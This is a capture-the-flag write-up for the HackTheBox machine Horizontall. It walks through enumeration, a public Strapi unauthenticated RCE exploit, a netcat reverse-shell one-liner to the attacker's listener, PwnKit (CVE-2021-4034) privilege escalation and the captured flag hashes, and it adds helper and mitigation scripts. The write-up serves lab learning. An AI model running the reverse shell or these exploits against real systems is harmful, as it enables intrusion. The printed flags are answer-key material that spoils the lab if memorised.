CTF Horizontall

  1. Description
  2. nmap
  3. Port 80
  4. Javascript
  5. gobuster
  6. exploit strapi
  7. Strapi shell
  8. exploit
    1. Upload
    2. Make

Description

Horizontall from HTB.

nmap

nmap -sV -p- 10.10.11.105
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)

Port 80

It's forbidden when I browse by IP, so I have to add the DNS name to /etc/hosts:

/etc/hosts
10.10.11.105 horizontall.htb

Javascript

The file /js/app.c68eb462.js is minified/obfuscated, so I have to use a tool to read it:
https://lelinhtinh.github.io/de4js/
In it I found the link http://api-prod.horizontall.htb/reviews
I have to add api-prod.horizontall.htb to my /etc/hosts file too (same IP).
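The manual step above (de4js, spot the api-prod hostname, edit /etc/hosts) done with grep, as an added example that is not part of the original write-up. The bundle content is a constructed sample standing in for /js/app.c68eb462.js; it also takes an optional suffix filter (e.g. .htb) so only in-scope hosts come out.

```bash
# Added example: pull hostnames out of a minified JS bundle and emit /etc/hosts lines.
# The bundle below is a constructed sample, not the real /js/app.c68eb462.js.

make_sample_bundle() {
  # Writes a fake minified bundle to a temp file and prints its path.
  f=$(mktemp)
  printf '%s' '!function(e){var t="http://api-prod.horizontall.htb/reviews";fetch(t).then(function(e){return e.json()});var n="https://fonts.googleapis.com/css?family=Roboto";var r="http://api-prod.horizontall.htb/users"}();' > "$f"
  printf '%s\n' "$f"
}

extract_hosts() {
  # $1 = bundle file, $2 = optional suffix filter (e.g. ".htb") to keep only in-scope hosts.
  # Prints the unique hostnames found in http(s) URLs, one per line, sorted.
  grep -oE 'https?://[A-Za-z0-9.-]+' "$1" | sed -E 's#^https?://##' | sort -u |
    while read -r h; do
      case "$h" in
        *"${2:-}") printf '%s\n' "$h" ;;
      esac
    done
}

hosts_lines() {
  # $1 = bundle file, $2 = target IP, $3 = optional suffix filter.
  # Prints lines ready to append to /etc/hosts.
  extract_hosts "$1" "${3:-}" | while read -r h; do printf '%s %s\n' "$2" "$h"; done
}

# Usage:
#   f=$(make_sample_bundle)
#   hosts_lines "$f" 10.10.11.105 .htb   # -> 10.10.11.105 api-prod.horizontall.htb
```

Caveat: a bundler can split a URL across concatenated strings ("api-prod." + "horizontall.htb"), which this regex misses; when the output looks thin, fall back to reading the beautified file by hand as done above.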

gobuster

gobuster dir -u http://api-prod.horizontall.htb/ -w Documents/wordlist/directory-list-2.3-small.txt -t 150 --wildcard | grep "(Status:"
/admin                (Status: 200) [Size: 854]
/users                (Status: 403) [Size: 60] 
/reviews              (Status: 200) [Size: 507]
/Reviews              (Status: 200) [Size: 507]
/Users                (Status: 403) [Size: 60] 
/Admin                (Status: 200) [Size: 854]
/REVIEWS              (Status: 200) [Size: 507]

At /admin we get the Strapi admin login page.
At /reviews we get a JSON document.

exploit strapi

https://www.exploit-db.com/exploits/50239 (Strapi CMS 3.0.0-beta.17.4, unauthenticated RCE)

python3 50239.py http://api-prod.horizontall.htb

The shell is broken but we have the creds.

[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1

One week later…

Ok, the credentials are useless; I have to use the blind RCE.

On my computer:

nc -nlvp 4242

Blind RCE, the command sent through the exploit:

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.214 4242 >/tmp/f

And I’m in.

Strapi shell

In /home/developer/user.txt:
e6cb8f6f0831dc40507c330d548ea384

exploit

Upload

Look at this boy, it's so cool (dragon is a drag-and-drop source/target for X11):

dragon *

Make

This is a new exploit, released 2 days ago: PwnKit, CVE-2021-4034, a local privilege escalation in polkit's setuid pkexec.
https://github.com/berdav/CVE-2021-4034

I’m using dragon to drag and drop my files.

cat /root/root.txt

373da3c143300dec7f9357b24c8b202a

I really feel like a god xD Every computer is vulnerable, you have to update your system. When I started the box the exploit was not available yet.
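A quick check for whether a host is still exposed to PwnKit, as an added example that is not part of the original write-up. The exploit works only because pkexec is setuid root, so the documented stop-gap when you cannot update is `chmod 0755 /usr/bin/pkexec`. Version banners are not a reliable test: distros shipped the fix as a patch without bumping the version (a patched Ubuntu 18.04 pkexec still prints "pkexec version 0.105"), so the setuid bit is what to check, and the package manager is where to confirm the patch level.

```bash
# Added example: PwnKit (CVE-2021-4034) exposure check based on the setuid bit,
# plus the wider setuid sweep the same class of bug calls for.

is_setuid() {
  # $1 = path; returns 0 if the setuid bit is set.
  [ -u "$1" ]
}

pwnkit_exposure() {
  # $1 = path to pkexec (default /usr/bin/pkexec). Prints one of:
  #   missing    - nothing at that path
  #   mitigated  - present but not setuid; PwnKit cannot be used
  #   setuid     - setuid is set; confirm the patch level via the package manager
  p=${1:-/usr/bin/pkexec}
  if [ ! -e "$p" ]; then printf 'missing\n'
  elif is_setuid "$p"; then printf 'setuid\n'
  else printf 'mitigated\n'
  fi
}

list_setuid() {
  # $1 = directory; prints every setuid file under it, sorted. pkexec is just one
  # of the setuid binaries worth knowing about on a box you are defending.
  find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Usage on a live box:
#   pwnkit_exposure          # -> setuid | mitigated | missing
#   list_setuid /usr/bin
```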